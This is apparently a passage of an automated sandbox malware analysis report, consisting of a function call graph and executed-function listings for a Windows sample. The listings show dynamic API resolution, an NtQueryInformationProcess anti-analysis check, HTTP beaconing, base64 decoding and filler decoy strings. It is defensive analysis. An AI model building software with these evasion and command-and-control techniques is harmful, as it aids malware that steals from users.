7e42d9 38730->38731 38732 7e4610 2 API calls 38731->38732 38733 7e42f2 38732->38733 38734 7e4610 2 API calls 38733->38734 38735 7e430b 38734->38735 38736 7e4610 2 API calls 38735->38736 38737 7e4324 38736->38737 38738 7e4610 2 API calls 38737->38738 38739 7e433d 38738->38739 38740 7e4610 2 API calls 38739->38740 38741 7e4356 38740->38741 38742 7e4610 2 API calls 38741->38742 38743 7e436f 38742->38743 38744 7e4610 2 API calls 38743->38744 38745 7e4388 38744->38745 38746 7e4610 2 API calls 38745->38746 38747 7e43a1 38746->38747 38748 7e4610 2 API calls 38747->38748 38749 7e43ba 38748->38749 38750 7e4610 2 API calls 38749->38750 38751 7e43d3 38750->38751 38752 7e4610 2 API calls 38751->38752 38753 7e43ec 38752->38753 38754 7e4610 2 API calls 38753->38754 38755 7e4405 38754->38755 38756 7e4610 2 API calls 38755->38756 38757 7e441e 38756->38757 38758 7e4610 2 API calls 38757->38758 38759 7e4437 38758->38759 38760 7e4610 2 API calls 38759->38760 38761 7e4450 38760->38761 38762 7e4610 2 API calls 38761->38762 38763 7e4469 38762->38763 38764 7e4610 2 API calls 38763->38764 38765 7e4482 38764->38765 38766 7e4610 2 API calls 38765->38766 38767 7e449b 38766->38767 38768 7e4610 2 API calls 38767->38768 38769 7e44b4 38768->38769 38770 7e4610 2 API calls 38769->38770 38771 7e44cd 38770->38771 38772 7e4610 2 API calls 38771->38772 38773 7e44e6 38772->38773 38774 7e4610 2 API calls 38773->38774 38775 7e44ff 38774->38775 38776 7e4610 2 API calls 38775->38776 38777 7e4518 38776->38777 38778 7e4610 2 API calls 38777->38778 38779 7e4531 38778->38779 38780 7e4610 2 API calls 38779->38780 38781 7e454a 38780->38781 38782 7e4610 2 API calls 38781->38782 38783 7e4563 38782->38783 38784 7e4610 2 API calls 38783->38784 38785 7e457c 38784->38785 38786 7e4610 2 API calls 38785->38786 38787 7e4595 38786->38787 38788 7e4610 2 API calls 38787->38788 38789 7e45ae 38788->38789 38790 7e4610 2 API calls 38789->38790 38791 7e45c7 38790->38791 38792 7e4610 2 API calls 38791->38792 38793 7e45e0 38792->38793 38794 7e4610 2 API calls 38793->38794 38795 7e45f9 38794->38795 38796 7f9f20 38795->38796 38797 7fa346 8 API calls 38796->38797 38798 7f9f30 43 API calls 38796->38798 38799 7fa3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38797->38799 38800 7fa456 38797->38800 38798->38797 38799->38800 38801 7fa526 38800->38801 38802 7fa463 8 API calls 38800->38802 38803 7fa52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38801->38803 38804 7fa5a8 38801->38804 38802->38801 38803->38804 38805 7fa647 38804->38805 38806 7fa5b5 6 API calls 38804->38806 38807 7fa72f 38805->38807 38808 7fa654 9 API calls 38805->38808 38806->38805 38809 7fa738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38807->38809 38810 7fa7b2 38807->38810 38808->38807 38809->38810 38811 7fa7ec 38810->38811 38812 7fa7bb GetProcAddress GetProcAddress 38810->38812 38813 7fa825 38811->38813 38814 7fa7f5 GetProcAddress GetProcAddress 38811->38814 38812->38811 38815 7fa922 38813->38815 38816 7fa832 10 API calls 38813->38816 38814->38813 38817 7fa98d 38815->38817 38818 7fa92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38815->38818 38816->38815 38819 7fa9ae 38817->38819 38820 7fa996 GetProcAddress 38817->38820 38818->38817 38821 7f5ef3 38819->38821 38822 7fa9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38819->38822 38820->38819 38823 7e1590 38821->38823 38822->38821 39093 7e16b0 38823->39093 38826 7faab0 lstrcpy 38827 7e15b5 38826->38827 38828 7faab0 lstrcpy 38827->38828 38829 7e15c7 38828->38829 38830 7faab0 lstrcpy 38829->38830 38831 7e15d9 38830->38831 38832 7faab0 lstrcpy 38831->38832 38833 7e1663 38832->38833 38834 7f5760 38833->38834 38835 7f5771 38834->38835 38836 7fab30 2 API calls 38835->38836 38837 7f577e 38836->38837 38838 7fab30 2 API calls 38837->38838 38839 7f578b 38838->38839 38840 7fab30 2 API calls 38839->38840 38841 7f5798 38840->38841 38842 7faa50 lstrcpy 38841->38842 38843 7f57a5 38842->38843 38844 7faa50 lstrcpy 38843->38844 38845 7f57b2 38844->38845 38846 7faa50 lstrcpy 38845->38846 38847 7f57bf 38846->38847 38848 7faa50 lstrcpy 38847->38848 38884 7f57cc 38848->38884 38849 7faa50 lstrcpy 38849->38884 38850 7f5893 StrCmpCA 38850->38884 38851 7f58f0 StrCmpCA 38852 7f5a2c 38851->38852 38851->38884 38853 7fabb0 lstrcpy 38852->38853 38854 7f5a38 38853->38854 38855 7fab30 2 API calls 38854->38855 38857 7f5a46 38855->38857 38856 7fab30 lstrlen lstrcpy 38856->38884 38859 7fab30 2 API calls 38857->38859 38858 7f5aa6 StrCmpCA 38860 7f5be1 38858->38860 38858->38884 38862 7f5a55 38859->38862 38861 7fabb0 lstrcpy 38860->38861 38863 7f5bed 38861->38863 38864 7e16b0 lstrcpy 38862->38864 38865 7fab30 2 API calls 38863->38865 38888 7f5a61 38864->38888 38868 7f5bfb 38865->38868 38866 7f5510 25 API calls 38866->38884 38867 7f5440 20 API calls 38867->38884 38870 7fab30 2 API calls 38868->38870 38869 7f5c5b StrCmpCA 38871 7f5c78 38869->38871 38872 7f5c66 Sleep 38869->38872 38874 7f5c0a 38870->38874 38875 7fabb0 lstrcpy 38871->38875 38872->38884 38873 7fabb0 lstrcpy 38873->38884 38877 7e16b0 lstrcpy 38874->38877 38876 7f5c84 38875->38876 38878 7fab30 2 API calls 38876->38878 38877->38888 38879 7f5c93 38878->38879 38880 7fab30 2 API calls 38879->38880 38881 7f5ca2 38880->38881 38883 7e16b0 lstrcpy 38881->38883 38882 7f59da StrCmpCA 38882->38884 38883->38888 38884->38849 38884->38850 38884->38851 38884->38856 38884->38858 38884->38866 38884->38867 38884->38869 38884->38873 38884->38882 38885 7faab0 lstrcpy 38884->38885 38886 7f5b8f StrCmpCA 38884->38886 38887 7e1590 lstrcpy 38884->38887 38885->38884 38886->38884 38887->38884 38888->37941 38890 7f76dc 38889->38890 38891 7f76e3 GetVolumeInformationA 38889->38891 38890->38891 38895 7f7721 38891->38895 38892 7f778c GetProcessHeap RtlAllocateHeap 38893 7f77a9 38892->38893 38894 7f77b8 wsprintfA 38892->38894 38896 7faa50 lstrcpy 38893->38896 38897 7faa50 lstrcpy 38894->38897 38895->38892 38898 7f5ff7 38896->38898 38897->38898 38898->37962 38900 7faab0 lstrcpy 38899->38900 38901 7e48e9 38900->38901 39102 7e4800 38901->39102 38903 7e48f5 38904 7faa50 lstrcpy 38903->38904 38905 7e4927 38904->38905 38906 7faa50 lstrcpy 38905->38906 38907 7e4934 38906->38907 38908 7faa50 lstrcpy 38907->38908 38909 7e4941 38908->38909 38910 7faa50 lstrcpy 38909->38910 38911 7e494e 38910->38911 38912 7faa50 lstrcpy 38911->38912 38913 7e495b InternetOpenA StrCmpCA 38912->38913 38914 7e4994 38913->38914 38915 7e4f1b InternetCloseHandle 38914->38915 39108 7f8cf0 38914->39108 38917 7e4f38 38915->38917 39123 7ea210 CryptStringToBinaryA 38917->39123 38918 7e49b3 39116 7fac30 38918->39116 38921 7e49c6 38923 7fabb0 lstrcpy 38921->38923 38928 7e49cf 38923->38928 38924 7fab30 2 API calls 38925 7e4f55 38924->38925 38927 7facc0 4 API calls 38925->38927 38926 7e4f77 ctype 38930 7faab0 lstrcpy 38926->38930 38929 7e4f6b 38927->38929 38932 7facc0 4 API calls 38928->38932 38931 7fabb0 lstrcpy 38929->38931 38943 7e4fa7 38930->38943 38931->38926 38933 7e49f9 38932->38933 38934 7fabb0 lstrcpy 38933->38934 38935 7e4a02 38934->38935 38936 7facc0 4 API calls 38935->38936 38937 7e4a21 38936->38937 38938 7fabb0 lstrcpy 38937->38938 38939 7e4a2a 38938->38939 38940 7fac30 3 API calls 38939->38940 38941 7e4a48 38940->38941 38942 7fabb0 lstrcpy 38941->38942 38944 7e4a51 38942->38944 38943->37965 38945 7facc0 4 API calls 38944->38945 38946 7e4a70 38945->38946 38947 7fabb0 lstrcpy 38946->38947 38948 7e4a79 38947->38948 38949 7facc0 4 API calls 38948->38949 38950 7e4a98 38949->38950 38951 7fabb0 lstrcpy 38950->38951 38952 7e4aa1 38951->38952 38953 7facc0 4 API calls 38952->38953 38954 7e4acd 38953->38954 38955 7fac30 3 API calls 38954->38955 38956 7e4ad4 38955->38956 38957 7fabb0 lstrcpy 38956->38957 38958 7e4add 38957->38958 38959 7e4af3 InternetConnectA 38958->38959 38959->38915 38960 7e4b23 HttpOpenRequestA 38959->38960 38962 7e4f0e InternetCloseHandle 38960->38962 38963 7e4b78 38960->38963 38962->38915 38964 7facc0 4 API calls 38963->38964 38965 7e4b8c 38964->38965 38966 7fabb0 lstrcpy 38965->38966 38967 7e4b95 38966->38967 38968 7fac30 3 API calls 38967->38968 38969 7e4bb3 38968->38969 38970 7fabb0 lstrcpy 38969->38970 38971 7e4bbc 38970->38971 38972 7facc0 4 API calls 38971->38972 38973 7e4bdb 38972->38973 38974 7fabb0 lstrcpy 38973->38974 38975 7e4be4 38974->38975 38976 7facc0 4 API calls 38975->38976 38977 7e4c05 38976->38977 38978 7fabb0 lstrcpy 38977->38978 38979 7e4c0e 38978->38979 38980 7facc0 4 API calls 38979->38980 38981 7e4c2e 38980->38981 38982 7fabb0 lstrcpy 38981->38982 38983 7e4c37 38982->38983 38984 7facc0 4 API calls 38983->38984 38985 7e4c56 38984->38985 38986 7fabb0 lstrcpy 38985->38986 38987 7e4c5f 38986->38987 38988 7fac30 3 API calls 38987->38988 38989 7e4c7d 38988->38989 38990 7fabb0 lstrcpy 38989->38990 38991 7e4c86 38990->38991 38992 7facc0 4 API calls 38991->38992 38993 7e4ca5 38992->38993 38994 7fabb0 lstrcpy 38993->38994 38995 7e4cae 38994->38995 38996 7facc0 4 API calls 38995->38996 38997 7e4ccd 38996->38997 38998 7fabb0 lstrcpy 38997->38998 38999 7e4cd6 38998->38999 39000 7fac30 3 API calls 38999->39000 39001 7e4cf4 39000->39001 39002 7fabb0 lstrcpy 39001->39002 39003 7e4cfd 39002->39003 39004 7facc0 4 API calls 39003->39004 39005 7e4d1c 39004->39005 39006 7fabb0 lstrcpy 39005->39006 39007 7e4d25 39006->39007 39008 7facc0 4 API calls 39007->39008 39009 7e4d46 39008->39009 39010 7fabb0 lstrcpy 39009->39010 39011 7e4d4f 39010->39011 39012 7facc0 4 API calls 39011->39012 39013 7e4d6f 39012->39013 39014 7fabb0 lstrcpy 39013->39014 39015 7e4d78 39014->39015 39016 7facc0 4 API calls 39015->39016 39017 7e4d97 39016->39017 39018 7fabb0 lstrcpy 39017->39018 39019 7e4da0 39018->39019 39020 7fac30 3 API calls 39019->39020 39021 7e4dbe 39020->39021 39022 7fabb0 lstrcpy 39021->39022 39023 7e4dc7 39022->39023 39024 7faa50 lstrcpy 39023->39024 39025 7e4de2 39024->39025 39026 7fac30 3 API calls 39025->39026 39027 7e4e03 39026->39027 39028 7fac30 3 API calls 39027->39028 39029 7e4e0a 39028->39029 39030 7fabb0 lstrcpy 39029->39030 39031 7e4e16 39030->39031 39032 7e4e37 lstrlen 39031->39032 39033 7e4e4a 39032->39033 39034 7e4e53 lstrlen 39033->39034 39122 7fade0 39034->39122 39036 7e4e63 HttpSendRequestA 39037 7e4e82 InternetReadFile 39036->39037 39038 7e4eb7 InternetCloseHandle 39037->39038 39043 7e4eae 39037->39043 39040 7fab10 39038->39040 39040->38962 39041 7facc0 4 API calls 39041->39043 39042 7fabb0 lstrcpy 39042->39043 39043->39037 39043->39038 39043->39041 39043->39042 39129 7fade0 39044->39129 39046 7f1a14 StrCmpCA 39047 7f1a1f ExitProcess 39046->39047 39050 7f1a27 39046->39050 39048 7f1c12 39048->37967 39049 7f1b1f StrCmpCA 39049->39050 39050->39048 39050->39049 39051 7f1afd StrCmpCA 39050->39051 39052 7f1acf StrCmpCA 39050->39052 39053 7f1aad StrCmpCA 39050->39053 39054 7f1b63 StrCmpCA 39050->39054 39055 7f1b82 StrCmpCA 39050->39055 39056 7f1b41 StrCmpCA 39050->39056 39057 7f1ba1 StrCmpCA 39050->39057 39058 7f1bc0 StrCmpCA 39050->39058 39059 7fab30 lstrlen lstrcpy 39050->39059 39051->39050 39052->39050 39053->39050 39054->39050 39055->39050 39056->39050 39057->39050 39058->39050 39059->39050 39060->37973 39061->37975 39062->37981 39063->37983 39064->37989 39065->37991 39066->37995 39067->37999 39068->38003 39069->38009 39070->38011 39071->38015 39072->38029 39073->38032 39074->38033 39075->38028 39076->38033 39077->38048 39078->38035 39079->38039 39080->38040 39081->38045 39082->38050 39083->38052 39084->38059 39085->38065 39086->38086 39087->38090 39088->38089 39089->38085 39090->38089 39091->38099 39094 7faab0 lstrcpy 39093->39094 39095 7e16c3 39094->39095 39096 7faab0 lstrcpy 39095->39096 39097 7e16d5 39096->39097 39098 7faab0 lstrcpy 39097->39098 39099 7e16e7 39098->39099 39100 7faab0 lstrcpy 39099->39100 39101 7e15a3 39100->39101 39101->38826 39103 7e4816 39102->39103 39104 7e4888 lstrlen 39103->39104 39128 7fade0 39104->39128 39106 7e4898 InternetCrackUrlA 39107 7e48b7 39106->39107 39107->38903 39109 7faa50 lstrcpy 39108->39109 39110 7f8d04 39109->39110 39111 7faa50 lstrcpy 39110->39111 39112 7f8d12 GetSystemTime 39111->39112 39113 7f8d29 39112->39113 39114 7faab0 lstrcpy 39113->39114 39115 7f8d8c 39114->39115 39115->38918 39117 7fac41 39116->39117 39118 7fac98 39117->39118 39120 7fac78 lstrcpy lstrcat 39117->39120 39119 7faab0 lstrcpy 39118->39119 39121 7faca4 39119->39121 39120->39118 39121->38921 39122->39036 39124 7e4f3e 39123->39124 39125 7ea249 LocalAlloc 39123->39125 39124->38924 39124->38926 39125->39124 39126 7ea264 CryptStringToBinaryA 39125->39126 39126->39124 39127 7ea289 LocalFree 39126->39127 39127->39124 39128->39106 39129->39046

                                  Executed Functions

                                  Function 007F9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 7f9bb0-7f9bc4 call 7f9aa0 663 7f9bca-7f9dde call 7f9ad0 GetProcAddress * 21 660->663 664 7f9de3-7f9e42 LoadLibraryA * 5 660->664 663->664 666 7f9e5d-7f9e64 664->666 667 7f9e44-7f9e58 GetProcAddress 664->667 669 7f9e96-7f9e9d 666->669 670 7f9e66-7f9e91 GetProcAddress * 2 666->670 667->666 671 7f9e9f-7f9eb3 GetProcAddress 669->671 672 7f9eb8-7f9ebf 669->672 670->669 671->672 673 7f9ed9-7f9ee0 672->673 674 7f9ec1-7f9ed4 GetProcAddress 672->674 675 7f9ee2-7f9f0c GetProcAddress * 2 673->675 676 7f9f11-7f9f12 673->676 674->673 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01450720), ref: 007F9BF1
                                  • GetProcAddress.KERNEL32(75900000,014507E0), ref: 007F9C0A
                                  • GetProcAddress.KERNEL32(75900000,014507C8), ref: 007F9C22
                                  • GetProcAddress.KERNEL32(75900000,01450798), ref: 007F9C3A
                                  • GetProcAddress.KERNEL32(75900000,01450828), ref: 007F9C53
                                  • GetProcAddress.KERNEL32(75900000,01458940), ref: 007F9C6B
                                  • GetProcAddress.KERNEL32(75900000,014464E0), ref: 007F9C83
                                  • GetProcAddress.KERNEL32(75900000,01446460), ref: 007F9C9C
                                  • GetProcAddress.KERNEL32(75900000,01450840), ref: 007F9CB4
                                  • GetProcAddress.KERNEL32(75900000,01450558), ref: 007F9CCC
                                  • GetProcAddress.KERNEL32(75900000,01450570), ref: 007F9CE5
                                  • GetProcAddress.KERNEL32(75900000,01450588), ref: 007F9CFD
                                  • GetProcAddress.KERNEL32(75900000,014463C0), ref: 007F9D15
                                  • GetProcAddress.KERNEL32(75900000,01450600), ref: 007F9D2E
                                  • GetProcAddress.KERNEL32(75900000,01450618), ref: 007F9D46
                                  • GetProcAddress.KERNEL32(75900000,01446320), ref: 007F9D5E
                                  • GetProcAddress.KERNEL32(75900000,01450660), ref: 007F9D77
                                  • GetProcAddress.KERNEL32(75900000,01450858), ref: 007F9D8F
                                  • GetProcAddress.KERNEL32(75900000,01446560), ref: 007F9DA7
                                  • GetProcAddress.KERNEL32(75900000,014508D0), ref: 007F9DC0
                                  • GetProcAddress.KERNEL32(75900000,01446640), ref: 007F9DD8
                                  • LoadLibraryA.KERNEL32(014508B8,?,007F6CA0), ref: 007F9DEA
                                  • LoadLibraryA.KERNEL32(01450870,?,007F6CA0), ref: 007F9DFB
                                  • LoadLibraryA.KERNEL32(014508E8,?,007F6CA0), ref: 007F9E0D
                                  • LoadLibraryA.KERNEL32(01450900,?,007F6CA0), ref: 007F9E1F
                                  • LoadLibraryA.KERNEL32(01450888,?,007F6CA0), ref: 007F9E30
                                  • GetProcAddress.KERNEL32(75070000,01450918), ref: 007F9E52
                                  • GetProcAddress.KERNEL32(75FD0000,014508A0), ref: 007F9E73
                                  • GetProcAddress.KERNEL32(75FD0000,01458E38), ref: 007F9E8B
                                  • GetProcAddress.KERNEL32(75A50000,01458DD8), ref: 007F9EAD
                                  • GetProcAddress.KERNEL32(74E50000,014464A0), ref: 007F9ECE
                                  • GetProcAddress.KERNEL32(76E80000,01458850), ref: 007F9EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 007F9F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 007F9EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 8ce3e565a68b3e7c34ecbdef417c5bd527a559d45ed9373a33245ea5fe143fa7
                                  • Instruction ID: 0415f701f3301cdc46f9576158f2f84905a8c179e4b22535e731a97ec5953d7b
                                  • Opcode Fuzzy Hash: 8ce3e565a68b3e7c34ecbdef417c5bd527a559d45ed9373a33245ea5fe143fa7
                                  • Instruction Fuzzy Hash: 24A11FB55082009FC345DFE8FC889AA7BB9A78D701B50871AF609D33B2D6B99542DB60
                                  Function 007E4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 7e4610-7e46e5 RtlAllocateHeap 781 7e46f0-7e46f6 764->781 782 7e479f-7e47f9 VirtualProtect 781->782 783 7e46fc-7e479a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E465F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007E47EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46A7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4688
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4707
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E467D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4784
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E478F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened 